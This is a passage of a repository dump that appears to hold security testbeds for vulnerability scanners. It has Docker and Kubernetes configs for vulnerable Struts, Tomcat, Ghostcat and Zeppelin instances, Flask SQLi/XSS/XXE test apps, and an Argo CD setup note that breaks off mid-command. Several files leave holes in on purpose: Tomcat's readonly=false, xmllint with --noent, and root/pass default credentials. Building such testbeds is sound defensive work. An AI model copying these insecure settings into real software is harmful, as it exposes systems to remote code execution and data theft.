| metadata: 21 | name: apache-struts-cve-2017-9805 22 | labels: 23 | app: apache-struts-cve-2017-9805 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: apache-struts-cve-2017-9805 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: apache-struts-cve-2017-9805 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: apache-struts-cve-2017-9805 39 | image: gcr.io/tsunami-testbed/apache-struts-cve-2017-9805:latest 40 | ports: 41 | - containerPort: 8080 42 | -------------------------------------------------------------------------------- /apache/tomcat/CVE-2017-12617/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM openjdk:8-jre-slim 2 | 3 | ARG CONFIG 4 | ENV CONFIG=${CONFIG} 5 | 6 | # setenv 7 | ENV CATALINA_HOME=/usr/local/tomcat 8 | ENV PATH=$CATALINA_HOME/bin:$PATH 9 | ENV TOMCAT_VERSION=8.5.16 10 | 11 | RUN mkdir -p $CATALINA_HOME 12 | 13 | # download Apache Tomcat 8.5.16 14 | RUN apt-get update && apt-get install -y curl && \ 15 | curl -fSL "https://archive.apache.org/dist/tomcat/tomcat-8/v${TOMCAT_VERSION}/bin/apache-tomcat-${TOMCAT_VERSION}.tar.gz" -o /tmp/tomcat.tar.gz && \ 16 | tar -xvf /tmp/tomcat.tar.gz -C ${CATALINA_HOME} --strip-components=1 17 | 18 | # set perms 19 | RUN chmod +x $CATALINA_HOME/bin/*.sh 20 | 21 | # depending on CONFIG, we might have vulnerable or not vulnerable testbed 22 | COPY ./web.xml ${CATALINA_HOME}/conf/web.xml 23 | RUN if [ "$CONFIG" = "vuln" ]; then \ 24 | sed -i 's/readonly<\/param-name>true<\/param-value>/readonly<\/param-name>false<\/param-value>/' \ 25 | /usr/local/tomcat/conf/web.xml; \ 26 | fi; 27 | 28 | EXPOSE 8080 29 | 30 | CMD ["catalina.sh", "run"] 31 | -------------------------------------------------------------------------------- /apache/tomcat/CVE-2017-12617/README.md: -------------------------------------------------------------------------------- 1 | # Apache Tomcat RCE Via JSP Upload (CVE-2017-12617) 2 | 3 | This directory contains the Dockerfile that can be used to build an 4 | Apache Tomcat instance vulnerable to CVE-2017-12617. 5 | 6 | Specifically, the dockerfile takes an optional build argument named 7 | `CONFIG`. If this argument is set to the value `vuln`, the build will 8 | produce a vulnerable service. In all other cases, the build will 9 | produce a non vulnerable service. 10 | 11 | In the vulnerable configuration, the `readonly` property in `web.xml` 12 | is set to `false`. To build a vulnerable version of the service 13 | proceed as follows. 14 | 15 | ```sh 16 | docker build --build-arg CONFIG=vuln -t tomcat . 17 | ``` 18 | 19 | In the non vulnerable configuration, the `readonly` property in 20 | `web.xml` is set to `true`. To build a non vulnerable version of the 21 | service proceed as follows. 22 | 23 | ```sh 24 | docker build -t tomcat . 25 | ``` 26 | 27 | Regardless of how the image has been built, to start the container 28 | proceed as follows. 29 | 30 | ```sh 31 | docker run --name tomcat --rm -d -p127.0.0.1:8080:8080 tomcat 32 | ``` 33 | 34 | The container is named `tomcat` and will listen to the endpoint 35 | `127.0.0.1:8080`. Once the testing has been done, stop the container 36 | with 37 | 38 | ```sh 39 | docker stop tomcat 40 | ``` 41 | 42 | **Apache Version**|**Affected Release Versions** 43 | :-----:|:-----:| 44 | Apache Tomcat 9|9.0.0 M1 to 9.0.0 45 | Apache Tomcat 8|8.0.0 RC1 to 8.0.46 and 8.5.0 to 8.5.22 46 | Apache Tomcat 7|7.0.0 to 7.0.81 47 | 48 | ## References 49 | * https://nvd.nist.gov/vuln/detail/cve-2017-12617 50 | * https://www.exploit-db.com/exploits/42966 51 | -------------------------------------------------------------------------------- /apache/tomcat/CVE-2020-1938/README.md: -------------------------------------------------------------------------------- 1 | # Ghostcat (CVE-2020-1938) 2 | 3 | This directory contains the deployment config for a default Tomcat application. 4 | Based on the provided version, the application might have an exposed AJP 5 | connector and therefore be vulnerable to Ghostcat. 6 | 7 | The deployed service has name `tomcat` and listens on port `8009` (AJP Connector 8 | port). 9 | 10 | **Note:** Change Tomcat version in [Template data](#template-data) according to 11 | which version you want to test. Below are the versions that are vulnerable to 12 | Ghostcat: 13 | 14 | **Apache Version**|**Affected Release Versions**|**Fixed Version** 15 | :-----:|:-----:|:-----: 16 | Apache Tomcat 9|9.0.30 and below|9.0.31 17 | Apache Tomcat 8|8.5.50 and below|8.5.51 18 | Apache Tomcat 7|7.0.99 and below|7.0.100 19 | 20 | ## Template data 21 | 22 | ```json 23 | { 24 | "tomcat_version": "8.5.32" 25 | } 26 | ``` -------------------------------------------------------------------------------- /apache/tomcat/CVE-2020-1938/tomcat_ghostcat.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the AJP connector from Tomcat. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: tomcat-ghostcat 6 | labels: 7 | app: tomcat-ghostcat 8 | spec: 9 | ports: 10 | - port: 8009 11 | name: ajp 12 | targetPort: 8009 13 | selector: 14 | app: tomcat-ghostcat 15 | type: LoadBalancer 16 | --- 17 | # The deployment of Tomcat. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: tomcat-ghostcat 22 | labels: 23 | app: tomcat-ghostcat 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: tomcat-ghostcat 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: tomcat-ghostcat 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: tomcat-ghostcat 39 | image: tomcat:${tomcat_version} 40 | ports: 41 | - containerPort: 8009 42 | -------------------------------------------------------------------------------- /apache/tomcat/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | tomcat: 5 | image: docker.io/bitnami/tomcat:10.1 6 | ports: 7 | - '8080:8080' 8 | volumes: 9 | - 'tomcat_data:/bitnami/tomcat' 10 | environment: 11 | - TOMCAT_USERNAME=root 12 | - TOMCAT_PASSWORD=pass 13 | 14 | volumes: 15 | tomcat_data: 16 | driver: local -------------------------------------------------------------------------------- /apache/tomcat/weak_credentials/tomcat.md: -------------------------------------------------------------------------------- 1 | # Tomcat 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to view the selected username and password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Connect to it locally by going to `localhost:8080` 9 | 10 | 4. Verify to see if working properly: Log in by visiting `localhost:8080/manager/html` and using root credentials 11 | -------------------------------------------------------------------------------- /apache/zeppelin/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Apache Zeppelin Notebook 2 | 3 | This directory contains the deployment configs for a simple Apache Zeppelin 4 | Notebook application. The service listens on port `80`. 5 | 6 | This configs deploys the following services: 7 | 8 | - `apachezeppelin`: the Zeppelin Notebook application. 9 | -------------------------------------------------------------------------------- /apache/zeppelin/exposed_ui/zeppelin.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Zeppelin Notebook app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apachezeppelin 6 | labels: 7 | app: zeppelin 8 | version: ${zeppelin_version} 9 | spec: 10 | ports: 11 | - port: 80 12 | name: http 13 | targetPort: 8080 14 | selector: 15 | app: zeppelin 16 | version: ${zeppelin_version} 17 | type: LoadBalancer 18 | --- 19 | # The Zeppelin Notebook app. 20 | apiVersion: apps/v1 21 | kind: Deployment 22 | metadata: 23 | name: zeppelin 24 | labels: 25 | app: zeppelin 26 | version: ${zeppelin_version} 27 | spec: 28 | selector: 29 | matchLabels: 30 | app: zeppelin 31 | version: ${zeppelin_version} 32 | tier: frontend 33 | strategy: 34 | type: Recreate 35 | template: 36 | metadata: 37 | labels: 38 | app: zeppelin 39 | tier: frontend 40 | version: ${zeppelin_version} 41 | spec: 42 | containers: 43 | - name: zeppelin 44 | image: apache/zeppelin:${zeppelin_version} 45 | ports: 46 | - containerPort: 8080 47 | -------------------------------------------------------------------------------- /archery_range/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range 2 | 3 | The Archery Range is an assortion of (stateful) testbed applications aimed at 4 | web application security scanners. The goal is to have a testbed to evaluate the 5 | pure detection capabilities of scanners. Orthogonal aspects such as crawling or 6 | in-page coverage of, e.g., single page applications, need to be taken into 7 | considerations for a high-quality scanner, however, are purposefully not part of 8 | the goal of this testbed. For more information about a testbed aimed at crawling 9 | capabilities feel free to take a look at the [Crawl Maze](https://github.com/google/security-crawl-maze). 10 | 11 | ## Testbed applications 12 | 13 | The testbed applications can be found in their respective subfolders, e.g., 14 | `sqli/`, and contain instruction for running them locally. Testbed applications 15 | usually serve the index page under a prefix specific to the application, e.g., 16 | `http://127.0.0.1/sqli/` for the SQLI testbed application. As the testbed 17 | applications are vulnerable to high-impact issues, e.g., XXE, we advise to run 18 | them in a container/VM. 19 | -------------------------------------------------------------------------------- /archery_range/sqli/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range: SQLI Testbed 2 | 3 | The application hosts SQLI tests for web-security vulnerability scanners. 4 | 5 | It relies on a mysql and postgres db system running accessible to the 6 | application that was initialized using the respective scripts under `database/`. 7 | Connectivity to the DB's is done using environment parameters as per the 8 | following command. 9 | 10 | Install the requirements: 11 | ```sh 12 | pip3 install -r requirements.txt 13 | ``` 14 | 15 | Run the SQLI testbed: 16 | ```sh 17 | MYSQL_DB=archery_range MYSQL_USER=archery_range MYSQL_PASSWORD= MYSQL_HOST=127.0.0.1 POSTGRES_DB=archery_range POSTGRES_USER=archery_range POSTGRES_PASSWORD= POSTGRES_HOST=127.0.0.1 python3 app.py 18 | ``` 19 | -------------------------------------------------------------------------------- /archery_range/sqli/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/archery_range/sqli/__init__.py -------------------------------------------------------------------------------- /archery_range/sqli/app.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | """The entry point for Flask App serving the testbed's content.""" 16 | import os 17 | from absl import app 18 | from flask import Flask 19 | from flask import render_template 20 | from blueprints.googlesql.googlesql import googlesql_blueprint 21 | from blueprints.mysql.mysql import mysql_blueprint 22 | from blueprints.postgresql.postgresql import postgresql_blueprint 23 | from custom_message_error import CustomMessageError 24 | from googlesql_database.db_init import * 25 | 26 | flask_app = Flask(__name__) 27 | flask_app.register_blueprint(postgresql_blueprint, url_prefix="/sqli/postgresql") 28 | flask_app.register_blueprint(mysql_blueprint, url_prefix="/sqli/mysql") 29 | flask_app.register_blueprint(googlesql_blueprint, url_prefix="/sqli/googlesql") 30 | 31 | @flask_app.route("/") 32 | @flask_app.route("/sqli/") 33 | def index(): 34 | return render_template("index.html") 35 | 36 | 37 | @flask_app.errorhandler(CustomMessageError) 38 | def custom_message_error_handler(e): 39 | return render_template( 40 | "error.html", error_code=e.status_code, 41 | error_message=e.message), e.status_code 42 | 43 | 44 | def main(unused_argv): 45 | initialize_googlesql_db() 46 | flask_app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) 47 | 48 | if __name__ == '__main__': 49 | app.run(main) 50 | -------------------------------------------------------------------------------- /archery_range/sqli/custom_message_error.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | """Error for presenting error page with custom status code and custom error message.""" 16 | 17 | 18 | class CustomMessageError(Exception): 19 | 20 | def __init__(self, status_code, message): 21 | super().__init__() 22 | self.status_code = status_code 23 | self.message = message 24 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/cartitems.csv: -------------------------------------------------------------------------------- 1 | 1,20,9,6 2 | 2,3,4,6 3 | 3,2,5,6 4 | 4,13,1,6 5 | 5,11,5,2 6 | 6,14,9,2 7 | 7,2,5,10 8 | 8,6,6,9 9 | 9,8,1,9 10 | 10,19,12,9 11 | 11,13,11,9 12 | 12,12,44,9 13 | 13,18,75,9 14 | 14,1,6,5 15 | 15,2,12,5 16 | 16,3,15,9 17 | 17,5,100,9 18 | 18,7,16,9 19 | 19,9,22,9 20 | 20,20,4,9 21 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/carts.csv: -------------------------------------------------------------------------------- 1 | 1,voreilly 2 | 2,jazmyne81 3 | 3,jazmyne81 4 | 4,casper.bessie 5 | 5,jaylan.zulauf 6 | 6,voreilly 7 | 7,voreilly 8 | 8,ddietrich 9 | 9,jazmyne81 10 | 10,jazmyne81 11 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/items.csv: -------------------------------------------------------------------------------- 1 | 1,king penguin plush,"Long beak, with yellow, black, and white fur.",160.31,toy,True 2 | 2,honey badger plush,The most aggressive badger you will ever meet.,9999.99,toy,True 3 | 3,monkey plush,This guy will swing from vine to vine.,2.50,toy,True 4 | 4,sunflower seeds,Small seeds that are delicious and can even grow a sunflower.,0.00,food,True 5 | 5,apple,Bright red spheres with a waxy coating.,107.01,food,True 6 | 6,salmon,Use it as a pet or as dinner.,9999.99,food,False 7 | 7,curry paste,Add some authentic flavor to any dish.,9999.99,food,True 8 | 8,coconut,"It has a tough exterior, but a delicious interior.",11.16,food,True 9 | 9,ginger,"I do not like this, so you can have it.",0.00,food,True 10 | 10,cinnamon,Who knew we could turn this tree bark into something flavorful?,57.50,food,True 11 | 11,totem pole,This pole is 40 feet tall.,737.67,furniture,False 12 | 12,drawer,"Store your stuff, it even has a lock on it!",584.29,furniture,True 13 | 13,phone,Just a good old school phone.,25.92,electronic,False 14 | 14,computer,It runs LINUX!,337.50,electronic,True 15 | 15,flash drive,"Small and spacious, it holds 20 GB",9999.99,electronic,True 16 | 16,headphones,Active co-worker cancelling.,9999.99,electronic,False 17 | 17,server,Run your own website and brag about it to your friends.,1658.52,electronic,True 18 | 18,lotion,Keep your skin moisturized.,9999.99,hygiene,True 19 | 19,body wash,Keep your skin clean.,9999.99,hygiene,True 20 | 20,perfume,Did you know perfume is unisex? Perfume just has a higher concentration of essential oils.,0.00,hygiene,True 21 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/users.csv: -------------------------------------------------------------------------------- 1 | casper.bessie,green,immanuel.walker@example.net 2 | jazmyne81,yellow,znicolas@example.net 3 | jaylan.zulauf,purple,ptowne@example.net 4 | ddietrich,orange,alarkin@example.org 5 | voreilly,green,lind.maye@example.org 6 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/db_init.py: -------------------------------------------------------------------------------- 1 | import os 2 | from google.cloud import spanner 3 | import csv,ast 4 | # resources dependency 5 | OPERATION_TIMEOUT_SECONDS = 200 6 | 7 | instance_id = os.environ.get( 8 | "SPANNER_INSTANCE_ID", "tfgen-spanid-20230712060131434" 9 | ) 10 | database_id = "archery_range" 11 | 12 | def get_data_from_csv(filename): 13 | filepath = str("./googlesql_database/csv_files/"+filename) 14 | data = [] 15 | with open(filepath,'r') as csvfile: 16 | for row in csv.reader(csvfile,quotechar='"'): 17 | actual_row = [] 18 | for entry in row: 19 | try: 20 | actual_row.append(ast.literal_eval(str(entry))) 21 | except: 22 | actual_row.append(str(entry)) 23 | data.append(tuple(actual_row)) 24 | return data 25 | 26 | def build_db(database): 27 | operation = database.update_ddl( 28 | ddl_statements=[ 29 | """ CREATE TABLE IF NOT EXISTS `users` (`username` STRING(1024) NOT NULL,`color` STRING(1024) NOT NULL,`email` STRING(1024) NOT NULL ) PRIMARY KEY (`username`) """, 30 | """ CREATE TABLE IF NOT EXISTS `items` (`id` INT64 NOT NULL, `name` STRING(1024) NOT NULL, `description` STRING(1024) NOT NULL, `price` FLOAT64 NOT NULL, `category` STRING(1024), `is_available` BOOL NOT NULL ) PRIMARY KEY(`id`) """, 31 | """ CREATE TABLE IF NOT EXISTS `carts` (`id` INT64 NOT NULL, `username` STRING(1024) NOT NULL) PRIMARY KEY (`id`) """, 32 | """ CREATE TABLE IF NOT EXISTS `cartitems` (`id` INT64 NOT NULL, `item_id` INT64 NOT NULL, `quantity` INT64 NOT NULL, `cart_id` INT64 NOT NULL) PRIMARY KEY(`id`) """, 33 | ], 34 | ) 35 | operation.result(OPERATION_TIMEOUT_SECONDS) 36 | 37 | def insert_data(database): 38 | with database.batch() as batch: 39 | batch.insert_or_update( 40 | table = "users", 41 | columns = ("username","color","email"), 42 | values = get_data_from_csv("users.csv"), 43 | ) 44 | 45 | batch.insert_or_update( 46 | table = "items", 47 | columns = ("id","name","description","price","category","is_available"), 48 | values = get_data_from_csv("items.csv") 49 | ) 50 | 51 | batch.insert_or_update( 52 | table = "carts", 53 | columns = ("id","username"), 54 | values = get_data_from_csv("carts.csv") 55 | ) 56 | 57 | batch.insert_or_update( 58 | table = "cartitems", 59 | columns = ("id","item_id","quantity","cart_id"), 60 | values = get_data_from_csv("cartitems.csv") 61 | ) 62 | 63 | def initialize_googlesql_db(): 64 | try: 65 | spanner_client = spanner.Client() 66 | instance = spanner_client.instance(instance_id) 67 | database = instance.database(database_id) 68 | build_db(database) 69 | insert_data(database) 70 | print("db_init script passed") 71 | except Exception as e: 72 | print("db_init script failed"+ "\n" + "Error: " + str(e)) 73 | -------------------------------------------------------------------------------- /archery_range/sqli/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.2.2 2 | PyMySQL==1.0.2 3 | psycopg2-binary==2.9.3 4 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/error.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | {{error_code}} Error 20 | 21 | 22 |

23 | {{error_code}} Error 24 |

25 |

26 | {{error_message}} 27 |

28 | 29 | 30 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/index.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | Archery Range: SQL Injection 20 | 21 | 22 | 23 |

Archery Range: SQL Injection

24 | 25 |

Database Systems

26 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/index_database.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | Archery Range SQLI ({{ database }}) 20 | 21 | 22 | 23 |

Archery Range SQLI ({{ database }})

24 | 25 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/items.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | Archery Range SQLI 20 | 21 | 22 | 23 |

Archery Range SQLI: Items

24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | {% for item in db_items %} 34 | 35 | 36 | 37 | 38 | 39 | 41 | {% endfor %} 42 |
IdNamePriceCategoryDescription
{{ item.id }}{{ item.name }}{{ item.price }}{{ item.category }}{{ item.description }}
43 | 44 | 45 | -------------------------------------------------------------------------------- /archery_range/sqli/test_case_decorator.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | import collections 16 | 17 | TestCase = collections.namedtuple('TestCase', ['url', 'description']) 18 | 19 | 20 | class TestCaseDecorator: 21 | """An object containing all test cases that make up the test suite for a specific database system. 22 | 23 | Exposes its functionality via the decorator pattern. 24 | 25 | Attributes: 26 | url_prefix: The path prefix which hosts all test cases for the given 27 | database system. 28 | test_cases: The collected test cases containing the url and pointers to 29 | where injected values are being used in the query. 30 | """ 31 | 32 | def __init__(self, url_prefix: str): 33 | if not url_prefix.startswith('/'): 34 | raise ValueError('The url_prefix must start with a /.') 35 | 36 | self.url_prefix = url_prefix.rstrip('/') 37 | self.test_cases = list() 38 | 39 | def add_test_case(self, relative_url: str, description: str): 40 | """Adds a testcase to the internal state. 41 | 42 | Expands the relative URL with the prefix, matching the routes configured via 43 | the Flask blueprints. Stores the expanded URL together with the description 44 | and returns the identity function as decorator. 45 | 46 | Args: 47 | relative_url: the route to the testcase in the blueprint, including query 48 | parameters with default values 49 | description: A description where the provided values will be used in the 50 | query. 51 | 52 | Returns: 53 | The identity function 54 | """ 55 | if not relative_url.startswith('/'): 56 | raise ValueError( 57 | 'The relative_url provided to the decorator must start with a /.') 58 | self.test_cases.append( 59 | TestCase(self.url_prefix + relative_url, description)) 60 | 61 | def inner(func): 62 | return func 63 | 64 | return inner 65 | 66 | def get_test_cases(self): 67 | return self.test_cases 68 | -------------------------------------------------------------------------------- /archery_range/xss/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range: XSS Testbed 2 | 3 | The application hosts XSS tests for web-security vulnerability scanners. 4 | 5 | The core idea is to not statically provide tests but generate them through 6 | templating and string manipulation by picking the tests' components - 7 | namely source, sink, context and processing. 8 | 9 | There is a division between server-side and client-side tests. 10 | Some components such as DOM sources are only available on client-side 11 | and can thus not be processed and sinked on the server-side. 12 | 13 | The testbed is combinatorial in nature, thus, testing only specific cases is 14 | more reasonable than exhaustively testing all the XSS testcases. 15 | 16 | Install the requirements: 17 | ```sh 18 | pip3 install -r requirements.txt 19 | ``` 20 | 21 | Run the XSS testbed: 22 | ```sh 23 | python3 app.py 24 | ``` 25 | -------------------------------------------------------------------------------- /archery_range/xss/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/archery_range/xss/__init__.py -------------------------------------------------------------------------------- /archery_range/xss/components/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/archery_range/xss/components/__init__.py -------------------------------------------------------------------------------- /archery_range/xss/components/constants.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | import os 16 | import string 17 | 18 | APP_PORT = int(os.getenv("PORT", 8080)) 19 | 20 | # Cookie and client storage key used when retrieving and setting stored sources 21 | COOKIE_KEY = os.getenv('AR_COOKIE', 'archery_range') 22 | CLIENT_STORAGE_KEY = os.getenv('AR_STORAGE_KEY', 'archery_range') 23 | 24 | # POST/GET parameters used in the reflection source 25 | POST_PARAM_NAME = os.getenv("AR_POST_PARAM", "q") 26 | GET_PARAM_NAME = os.getenv("AR_GET_PARAM", "q") 27 | 28 | # List of characters considered safe in an URL 29 | # Used to validate component names during testing 30 | URL_SAFE_CHARS = list(string.ascii_letters) + list( 31 | string.digits) + [".", "-", "_"] 32 | -------------------------------------------------------------------------------- /archery_range/xss/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.2.2 2 | -------------------------------------------------------------------------------- /archery_range/xss/templates/index.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | Archery Range XSS 19 |

Archery Range XSS

20 | 21 |

Client XSS Sources

22 |
    23 | {% for name in client_sources %} 24 |
  • {{name}}
  • 25 | {% endfor %} 26 | 27 |
28 | 29 |

Server XSS Sources

30 |
    31 | {% for name in server_sources %} 32 |
  • {{name}}
  • 33 | {% endfor %} 34 |
35 | -------------------------------------------------------------------------------- /archery_range/xss/templates/source.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | Archery Range XSS 19 |

Archery Range XSS

20 | 21 |

{{list_name}}

22 |
    23 | {% for name, url in links.items() %} 24 |
  • {{name}}
  • 25 | {% endfor %} 26 |
27 | -------------------------------------------------------------------------------- /archery_range/xxe/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range: XXE Testbed 2 | 3 | The application hosts XXE tests for web-security vulnerability scanners. 4 | 5 | Most XML parsing libraries do correctly handle XML input and disable features 6 | such as entity expansion by default. Some even no longer allow to set insecure 7 | parsing modes at all. Thus, this testbed application is a simple wrapper around 8 | `xmllint` which can be configured insecurely by passing the `--noent` command 9 | line flag. 10 | 11 | The testbed requires the system to have the `xmllint` utility installed. 12 | 13 | Install the requirements: 14 | ```sh 15 | pip3 install -r requirements.txt 16 | sudo apt update && apt install libxml2-utils 17 | ``` 18 | 19 | Run the XXE testbed: 20 | ```sh 21 | python3 app.py 22 | ``` 23 | -------------------------------------------------------------------------------- /archery_range/xxe/app.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | """The entry point for the Flask app that is serving the XXE testbed.""" 16 | import os 17 | import subprocess 18 | 19 | from flask import Blueprint 20 | from flask import Flask 21 | from flask import make_response 22 | from flask import render_template 23 | from flask import request 24 | 25 | app = Flask(__name__) 26 | 27 | blueprint = Blueprint("xxe", __name__, template_folder="templates") 28 | 29 | 30 | @app.route("/") 31 | def health(): 32 | return make_response("XXE testbed is healthy!") 33 | 34 | 35 | @blueprint.route("/") 36 | def index(): 37 | return render_template("index.html") 38 | 39 | 40 | @blueprint.route("/reflect_xml_post_page", methods=["GET"]) 41 | def xxe_reflect_xml_post_page(): 42 | return render_template("reflect_xml_post.html") 43 | 44 | 45 | @blueprint.route("/reflect_xml_post_endpoint", methods=["POST"]) 46 | def xxe_reflect_xml_post_endpoint(): 47 | if not request.data: 48 | return make_response("Missing data in the request body!", 400) 49 | try: 50 | processed_xml = process_xml(request.data) 51 | except ValueError: 52 | return make_response("Could not parse the provided XML!", 400) 53 | 54 | response = make_response(processed_xml, 200) 55 | response.headers["Content-Type"] = "text/xml" 56 | return response 57 | 58 | 59 | def process_xml(xml_string): 60 | process = subprocess.Popen(["xmllint", "--noent", "-"], 61 | stdin=subprocess.PIPE, 62 | stdout=subprocess.PIPE, 63 | stderr=subprocess.PIPE) 64 | [stdout, stderr] = process.communicate(xml_string) 65 | if stderr: 66 | raise ValueError("XML could not be parsed") 67 | return stdout 68 | 69 | 70 | if __name__ == "__main__": 71 | app.register_blueprint(blueprint, url_prefix="/xxe") 72 | 73 | app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) 74 | -------------------------------------------------------------------------------- /archery_range/xxe/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.2.2 2 | -------------------------------------------------------------------------------- /archery_range/xxe/templates/index.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | XXE Testbed 19 |

XXE Testbed

20 | 25 | -------------------------------------------------------------------------------- /archery_range/xxe/templates/reflect_xml_post.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | XXE Testbed - Reflected POST with XML content 19 |

Reflected POST with XML content

20 |

21 | JavaScript on this page performs a request to a vulnerable XML processing endpoint with XML mime type. 22 |

23 | 33 | -------------------------------------------------------------------------------- /argo-cd/CVE-2022-29165/README.md: -------------------------------------------------------------------------------- 1 | # setup requirements 2 | 1. k8s with minikube: https://minikube.sigs.k8s.io/docs/start/ (we can use original k8s but this is a easy solution) 3 | 2. please don't forget to add `alias kubectl="minikube kubectl --"` to your shell environment. 4 | 5 | # setup vulnerable instance (v2.3.3) 6 | 7 | ```bash 8 | kubectl create namespace argocd 9 | kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.3.3/manifests/install.yaml 10 | kubectl edit -n argocd cm argocd-cm -o yaml 11 | ``` 12 | 13 | append the following: 14 | ```yaml 15 | data: 16 | users.anonymous.enabled: "true" 17 | ``` 18 | 19 | check anonymous access is enabled: 20 | `kubectl get -n argocd cm argocd-cm -o jsonpath='{.data.users\.anonymous\.enabled}'` 21 | 22 | give access to the server from 127.0.0.1:8082 for testing the plugin: 23 | `kubectl port-forward svc/argocd-server -n argocd 8082:443` 24 | 25 | check it manually in another shell: 26 | ```bash 27 | curl -i -s -k -X $'GET' -H $'Host: 127.0.0.1:8082' -b 